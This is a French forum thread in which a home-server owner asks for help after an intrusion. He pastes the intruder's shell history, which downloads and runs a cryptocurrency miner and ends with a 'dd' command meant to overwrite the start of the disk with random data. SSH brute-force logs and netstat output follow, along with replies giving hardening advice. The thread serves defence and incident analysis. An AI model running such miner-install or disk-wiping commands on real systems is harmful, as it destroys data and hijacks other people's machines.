Pages : 1
#1 Le 30/09/2016, à 07:29
- fredsaule
Petite intrusion - j'ai besoin d'analyse
Bonjour,
Hier soir, je me suis connecté sur mon serveur personnel (à domicile) et j'ai eu la surprise de voir le fond d'écran changé (l'image n'était pas dans mes goûts esthétiques).
J'ai un petit serveur à la maison, j'y accède avec tightvnc et ssh en complément (je ne fais pas de tunneling, mais je le mets en place ce matin).
Je ne sais pas précisément comment le pirate s'est introduit dans ma machine, mais il n'avait visiblement pas trouvé mon passwd. En témoigne ce que dit "history" :
304 cat /proc/cpuinfo
305 id
306 ps aux
307 cat /proc/cpuinfo
308 df
309 df -h
310 lscpu
311 top c
312 sudo su
313 dpkg
314 wget minergate.com/download/deb-cli
315 dpkg -x deb-cli .deb
316 cd .deb/opt/minergate-cli/
317 ./minergate-cli
318 ./minergate-cli -user alekx12555@mail.ru -bcn
319 screen ~~
320 ./minergate-cli -user alekx12555@mail.ru -bcn
321 sudo dd if=/dev/urandom of=/dev/sda count=512
Je n'identifie pas certaines commandes...Notamment :
_ minergate-cli semble être en relation avec les bitcoins.
_ deb-cli m'est inconnu aussi
_ screen ~~, connait pas
_ par contre la dernière commande (qui n'a pas marché car il n'a pas trouvé mon mdp) me semble très offensive (sudo dd if=/dev/urandom of=/dev/sda count=512)
J'ai bien évidemment coupé le NAT qui mène à mon port VNC car je suppose qu'il est entré par là. J'ai changé mon passwd (au cas où).
Je cherche des solutions pour savoir quels sont les ports ouverts sur ma machine et comment sécuriser mon accès (en graphique évidemment).
Merci pour vos conseils.
Fredsaule
Hors ligne
#2 Le 30/09/2016, à 07:53
- pitmix
Re : Petite intrusion - j'ai besoin d'analyse
Bonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/ … curite.php
"sudo dd if" n'est ce pas pour cloner ton disque dur ?
Dernière modification par pitmix (Le 30/09/2016, à 07:57)
Toshiba AMD A4-5000 APU avec Radeon (TM) HD graphics 1.5Ghz x64 avec 4go de Ram sous Ubuntu 14.04LTS dual boot Windows 8.1 upgrade Windows 10
Hors ligne
#3 Le 30/09/2016, à 07:54
- Nasman
Re : Petite intrusion - j'ai besoin d'analyse
Vu la logique des instructions passées, il semble qu'il devait avoir les droits sudo car après le sudo su (qui fait passer en root - et qui ne demande plus de mot de passe par la suite) apparaissent des instructions pour télécharger puis installer le programme ./minergate-cli
Je pense que s'il s'était fait jeter, il n'aurait pas poursuivi la manœuvre (à moins que ce soit un script qui faisait tout cela machinalement).
A priori la dernière commande devait effacer les 512 premiers secteurs (de 512 octets - option de bs par défaut) du disque
PS: comment te connectes tu par ssh à ton serveur, par clé ou par mot de passe ?
Dernière modification par Nasman (Le 30/09/2016, à 07:55)
PC fixe sous Bionic 64 bits et portable avec Focal 64 bits
Hors ligne
#4 Le 30/09/2016, à 08:13
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Bonjour,
Je me connecte en ssh par passwd (pas par clé) et aussi en direct par tightvnc (ce n'est plus vrai à présent car je fais du tunnel).
Je ne pense pas qu'il avait root pour 3 raisons :
_ la dernière commande n'a (à priori) pas marché sinon ma partition serait morte (j'ai rebooté hier sans problème).
_ L'autre aspect c'est que j'ai fait "history" en root et que rien n'est sorti.
_ j'ai retrouvé les reliquats d'installation dans /home/<mon user>, pas dans /root ou ailleurs.
Merci,
Fredsaule
Dernière modification par fredsaule (Le 30/09/2016, à 08:21)
Hors ligne
#5 Le 30/09/2016, à 08:17
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Merci, c'est pas mal comme site !
Fredsaule
Bonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/ … curite.php"sudo dd if" n'est ce pas pour cloner ton disque dur ?
Hors ligne
#6 Le 30/09/2016, à 08:40
- pires57
Re : Petite intrusion - j'ai besoin d'analyse
"sudo dd if" n'est ce pas pour cloner ton disque dur ?
Effectivement, dans le contexte présent ce n'est pas une histoire de clone de disque.
Dans le cas présent on remplace le contenu des 512 premier octets de /dev/sda par le contenu de /dev/urandom.
Grossièrement cela reviens à supprimer le contenu de ton MBR ainsi que celui de ta table des partitions.
Pourrais tu retourner :
- le fichier de config de ton SSH
- le fichier de log SSH
- le retour des commandes :
netstat -tanu
top
dpkg --get-selections |grep minergate* Tu as de la chance qu'il n'ai pas eu les droits root pour la dernière commande.
Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn
Hors ligne
#7 Le 30/09/2016, à 09:33
- Nasman
Re : Petite intrusion - j'ai besoin d'analyse
La syntaxe de dd est la suivante :
if= origine du fichier source, /dev/urandom générateur de nombre aléatoires
of= destination des blocs, ici ton disque dur sda
bs= taille d'un bloc de données, par défaut 512 octets
count= nombre de blocs traités, ici 512 blocs (de 512 octets), donc effacerait le mbr et les 511 secteurs suivants (dont le bloc à la LBA=1 qui peut contenir core.img, ou les entête gpt...)
skip= nombre de bloc sautée sur la source
seek= nombre de blocs sautés sur la destination
Si la commande avait été effective, ton système n'aurait pu être lancé mais il est possible de réaccéder à la partition système si cette dernière était alignée au mio (2048 secteurs de 512 octets). Avec un alignement au cylindre, les partitions commençant avant le 512ème secteur (adresse LBA) auraient été détruites définitivement.
Dernière modification par Nasman (Le 30/09/2016, à 09:38)
PC fixe sous Bionic 64 bits et portable avec Focal 64 bits
Hors ligne
#8 Le 30/09/2016, à 09:57
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Voici les éléments demandés :
- le fichier de config de ton SSH
Host *
# ForwardAgent no
# ForwardX11 no
# ForwardX11Trusted yes
# RhostsRSAAuthentication no
# RSAAuthentication yes
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# GSSAPIKeyExchange no
# GSSAPITrustDNS no
# BatchMode no
# CheckHostIP yes
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Protocol 2
# Cipher 3des
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no- le fichier de log SSH (de la période supposée de l'intrusion) :
Sep 29 10:05:08 gevara sshd[7035]: Disconnected from 221.194.47.229 port 33058 [preauth]
Sep 29 10:05:08 gevara sshd[7035]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229 user=root
Sep 29 10:05:13 gevara sshd[7037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229 user=root
Sep 29 10:05:14 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:17 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:18 gevara sshd[7039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76 user=root
Sep 29 10:05:19 gevara sshd[7039]: Failed password for root from 221.229.172.76 port 30319 ssh2
Sep 29 10:05:19 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:08:57 gevara dbus[525]: [system] Failed to activate service 'org.bluez': timed out
Sep 29 10:09:19 gevara sshd[7311]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88 user=root
Sep 29 10:09:21 gevara sshd[7311]: Failed password for root from 119.249.54.88 port 49429 ssh2
Sep 29 10:09:26 gevara sshd[7311]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 49429 ssh2]
Sep 29 10:09:27 gevara sshd[7311]: Received disconnect from 119.249.54.88 port 49429:11: [preauth]
Sep 29 10:09:27 gevara sshd[7311]: Disconnected from 119.249.54.88 port 49429 [preauth]
Sep 29 10:09:27 gevara sshd[7311]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88 user=root
Sep 29 10:09:29 gevara sshd[7335]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88 user=root
Sep 29 10:09:31 gevara sshd[7335]: Failed password for root from 119.249.54.88 port 55541 ssh2
Sep 29 10:09:36 gevara sshd[7335]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 55541 ssh2]
Sep 29 10:09:37 gevara sshd[7335]: Received disconnect from 119.249.54.88 port 55541:11: [preauth]
Sep 29 10:09:37 gevara sshd[7335]: Disconnected from 119.249.54.88 port 55541 [preauth]
Sep 29 10:09:37 gevara sshd[7335]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88 user=root
Sep 29 10:09:39 gevara sshd[7355]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88 user=root
Sep 29 10:09:41 gevara sshd[7355]: Failed password for root from 119.249.54.88 port 34660 ssh2
Sep 29 10:15:44 gevara sshd[7474]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76 user=root
Sep 29 10:15:45 gevara sshd[7474]: Failed password for root from 221.229.172.76 port 39707 ssh2
Sep 29 10:15:50 gevara sshd[7474]: message repeated 2 times: [ Failed password for root from 221.229.172.76 port 39707 ssh2]
Sep 29 10:15:50 gevara sshd[7474]: Received disconnect from 221.229.172.76 port 39707:11: [preauth]
Sep 29 10:15:50 gevara sshd[7474]: Disconnected from 221.229.172.76 port 39707 [preauth]et visiblement les tests pour entrer son toujours en cours :
Sep 30 10:51:13 gevara sshd[9748]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76 user=root
Sep 30 10:51:14 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Received disconnect from 121.18.238.109 port 42139:11: [preauth]
Sep 30 10:51:17 gevara sshd[9750]: Disconnected from 121.18.238.109 port 42139 [preauth]
Sep 30 10:51:17 gevara sshd[9750]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109 user=root
Sep 30 10:51:21 gevara sshd[9754]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109 user=root
Sep 30 10:51:23 gevara sshd[9754]: Failed password for root from 121.18.238.109 port 33234 ssh2
Sep 30 10:51:41 gevara sshd[9762]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76 user=root
Sep 30 10:51:43 gevara sshd[9762]: Failed password for root from 221.229.172.76 port 41063 ssh2(fort heureusement, mon root est inaccessible)
- le retour des commandes :
netstat -tanuConnexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale Adresse distante Etat
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5902 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:51413 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 192.168.0.11:51413 208.59.172.218:63746 TIME_WAIT
tcp 0 0 192.168.0.11:51413 79.70.37.215:64353 TIME_WAIT
tcp 0 0 192.168.0.11:51413 112.206.104.223:56884 TIME_WAIT
tcp 0 0 192.168.0.11:51413 208.59.172.218:63742 TIME_WAIT
tcp 0 0 192.168.0.11:40786 207.66.141.182:443 CLOSE_WAIT
tcp 1 0 192.168.0.11:40802 207.66.141.182:443 CLOSE_WAIT
tcp 0 0 192.168.0.11:51413 5.13.167.119:2292 TIME_WAIT
tcp 0 0 192.168.0.11:57992 104.20.40.187:80 ESTABLISHED
tcp 0 1 192.168.0.11:51413 89.140.204.131:4485 FIN_WAIT1
tcp 0 256 192.168.0.11:22 192.168.0.254:53796 ESTABLISHED
tcp 0 0 192.168.0.11:51413 197.149.178.174:64423 TIME_WAIT
tcp6 0 0 :::5900 :::* LISTEN
tcp6 0 0 :::51413 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 0.0.0.0:5353 0.0.0.0:*
udp 0 0 0.0.0.0:47015 0.0.0.0:*
udp 0 0 127.0.1.1:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 192.168.0.11:123 0.0.0.0:*
udp 0 0 127.0.0.1:123 0.0.0.0:*
udp 0 0 0.0.0.0:123 0.0.0.0:*
udp 0 0 0.0.0.0:51413 0.0.0.0:*
udp6 0 0 fe80::d869:80da:6bc:123 :::*
udp6 0 0 ::1:123 :::*
udp6 0 0 :::123 :::*toptop - 10:54:04 up 13:07, 2 users, load average: 0,03, 0,04, 0,00
Tâches: 156 total, 1 en cours, 155 en veille, 0 arrêté, 0 zombie
%Cpu(s): 2,8 ut, 0,3 sy, 0,1 ni, 96,8 id, 0,0 wa, 0,0 hi, 0,0 si, 0,0 st
KiB Mem : 4029024 total, 644600 libr, 979972 util, 2404452 tamp/cache
KiB Éch: 19530748 total, 19527960 libr, 2788 util. 2694648 dispo Mem
PID UTIL. PR NI VIRT RES SHR S %CPU %MEM TEMPS+ COM.
9857 fredsau+ 20 0 41992 3992 3312 R 11,8 0,1 0:00.02 top
1 root 20 0 119924 6080 4000 S 0,0 0,2 0:23.07 systemd
2 root 20 0 0 0 0 S 0,0 0,0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0,0 0,0 0:00.06 ksoftirqd/0
5 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 kworker/0:0H
7 root 20 0 0 0 0 S 0,0 0,0 0:13.02 rcu_sched
8 root 20 0 0 0 0 S 0,0 0,0 0:00.00 rcu_bh
9 root rt 0 0 0 0 S 0,0 0,0 0:00.03 migration/0
10 root rt 0 0 0 0 S 0,0 0,0 0:00.16 watchdog/0
11 root rt 0 0 0 0 S 0,0 0,0 0:00.17 watchdog/1
12 root rt 0 0 0 0 S 0,0 0,0 0:00.04 migration/1
13 root 20 0 0 0 0 S 0,0 0,0 0:00.42 ksoftirqd/1
15 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 kworker/1:0H
16 root rt 0 0 0 0 S 0,0 0,0 0:00.16 watchdog/2
17 root rt 0 0 0 0 S 0,0 0,0 0:00.03 migration/2
18 root 20 0 0 0 0 S 0,0 0,0 0:00.12 ksoftirqd/2
20 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 kworker/2:0H
21 root rt 0 0 0 0 S 0,0 0,0 0:00.09 watchdog/3
22 root rt 0 0 0 0 S 0,0 0,0 0:00.03 migration/3
23 root 20 0 0 0 0 S 0,0 0,0 0:00.07 ksoftirqd/3
25 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 kworker/3:0H
26 root 20 0 0 0 0 S 0,0 0,0 0:00.00 kdevtmpfs
27 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 netns
28 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 perf
29 root 20 0 0 0 0 S 0,0 0,0 0:00.04 khungtaskd
30 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 writeback
31 root 25 5 0 0 0 S 0,0 0,0 0:00.00 ksmd
32 root 39 19 0 0 0 S 0,0 0,0 0:01.18 khugepaged
33 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 crypto
34 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 kintegrityd
35 root 0 -20 0 0 0 S 0,0 0,0 0:00.00 biosetdpkg --get-selections |grep minergate* La commande ne rend rien
Merci,
Fredsaule
Hors ligne
#9 Le 30/09/2016, à 10:00
- bruno
Re : Petite intrusion - j'ai besoin d'analyse
Bonjour,
Tout d'abord si tu as une suspicion d'intrusion et que tu ne sais pas jusqu'où l'intrus a pu aller, il faut réinstaller complètement le système. Si tu veux poursuivre l'analyse de l'intrusion il faut déconnecter le serveur du réseau.
Visiblement l'intrus a simplement essayé d'installer un mineur de monnaie virtuelle (Bitcoin ou autre). Il n'était pas très doué puisqu'il a laissé ses commandes visibles dans l'historique, alors qu'il est extrêmement simple de faire en sorte que les commandes tapées ne soient pas enregistrées. Le « sudo su » ne plaide pas non plus en la faveur d'un hackeur de haut vol 
. Mais cela ne veut pas dire qu'il n'a pas commis d'autre dégâts par la suite…
D'un point de vue sécurité un accès VNC depuis l'Internet c'est très risqué (de toute façon un « serveur » ne devrait pas avoir d'interface graphique…). À éviter donc, ou à limiter strictement à certaines IP à travers un tunnel SSH et/ou au réseau local.
L'accès ssh peut être ouvert sur l'Internet à condition de le sécuriser un minimum : mot de passe très fort et/ou mieux accès par clé (RSA 4096 bits ou ed25519).
EDIT : si tu veux nous montrer ta configuration ssh, c'est le fichier sshd_config qu'il faut donner…
Dernière modification par bruno (Le 30/09/2016, à 10:02)
#10 Le 30/09/2016, à 10:07
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Bonjour,
Merci pour ce retour - je comprends (avec un peu de retard) que tightvnc n'est pas sécure du tout.
Voici le fichier de configuration ssh:
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
GatewayPorts yesCdt,
Fredsaule
Dernière modification par fredsaule (Le 30/09/2016, à 10:07)
Hors ligne
#11 Le 30/09/2016, à 10:29
- jplemoine
Re : Petite intrusion - j'ai besoin d'analyse
Et perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.
Dernière modification par jplemoine (Le 30/09/2016, à 10:30)
Ce compte ne servira plus : vous pouvez le supprimer si le coeur vous en dit...
Laissé par l'auteur pour historique.
Hors ligne
#12 Le 30/09/2016, à 10:39
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Et perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.
Fail2ban est présent et je suis en train de le tuner pour blacklister les indélicats.
Merci,
Fredsaule
Hors ligne
#13 Le 30/09/2016, à 12:46
- pires57
Re : Petite intrusion - j'ai besoin d'analyse
Alors :
Tu as pas mal de service en écoute (LISTEN). (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.
Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn
Hors ligne
#14 Le 30/09/2016, à 13:19
- fredsaule
Re : Petite intrusion - j'ai besoin d'analyse
Merci pour tes conseils.
J'ai déjà rallongé et complexifié mon mot de passe.
Je ne comprends pas comment autant d'IP peuvent me cibler (j'ai fait du ménage à la main avec iptable DROP)
Je te rejoins sur le fait de ne pas avoir d'interface graphique distante, néanmoins je reste attaché à la session X.
Je vais voir.
Cdt,
Fredsaule
Alors :
Tu as pas mal de service en écoute (LISTEN). (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.
Hors ligne
Pages : 1